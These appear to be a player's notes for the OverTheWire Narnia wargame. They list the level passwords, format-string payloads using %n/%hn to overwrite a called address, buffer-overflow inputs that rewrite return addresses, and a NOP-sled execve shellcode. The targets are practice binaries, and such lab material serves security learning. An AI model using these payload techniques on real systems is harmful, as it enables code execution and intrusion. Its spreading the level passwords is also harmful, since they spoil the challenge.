https://overthewire.org/wargames/narnia/
ssh narnia[i]@narnia.labs.overthewire.org -p 2226
passwd narnia1: eaa6AjYMBB
passwd narnia2: Zzb6MIyceT
passwd narnia3: 8SyQ2wyEDU
passwd narnia4: aKNxxrpDc1
passwd narnia5: 1oCoEkRJSB
passwd narnia6: BAV0SUV0iM
passwd narnia7: YY4F9UaB60
passwd narnia8: 1aBcDgPttG
#########################

narnia7
x/64wx $ebp-0x84
0xffffd318 is the address that gets called, so we need to change the address
at this address

find how to write at this address
r `python3 -c 'print("AAAA" + "%08x." * 10)'`
r `printf "\xe8\xd2\xff\xff"; python3 -c 'print("%026x." + "%n" + "%08x." * 8)'`
r `printf "\xe8\xd2\xff\xff"; python3 -c 'print("%037658x." + "%hn" + "%08x." * 8)'`

narnia8
0xffffd6b4:	0x6f636c6c	0x413d6564	0x41414141	0x41414141
`python3 -c 'print("B" * 20 + "C" * 128)'`
bok is at 0xffffd2a4
r `python3 -c 'print("B" * 20, end="")'; printf "\x25\xd5"; python3 -c 'print("C" * 128)'`
r `python3 -c 'print("B" * 20, end="")'; printf "\x24\xd5\xff\xff"; python3 -c 'print("C" * 128)'`
bok is at 0xffffd314
0xffffd6a4
r `python3 -c 'print("B" * 20, end="")'; printf "\xed\xd4\xff\xff"; printf "CCCCDDDD"`
r `python3 -c 'print("B" * 20, end="")'; printf "\xed\xd4\xff\xff"; printf "CCCC\x11\x92\x04\x08"`
r `python3 -c 'print("B" * 20, end="")'; printf "\xed\xd4\xff\xff"; printf "CCCCDDDD"`

#########################

shellcode payload http://shell-storm.org/shellcode/files/shellcode-607.html
57 bytes
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x21\\x80\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\\x71\\x8a\\xe2\\x53\\x6b\\x69\\x69\\x30\\x63\\x62\\x74\\x69\\x30\\x63\\x6a\\x6f\\x8a\\xe4\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81"

#########################
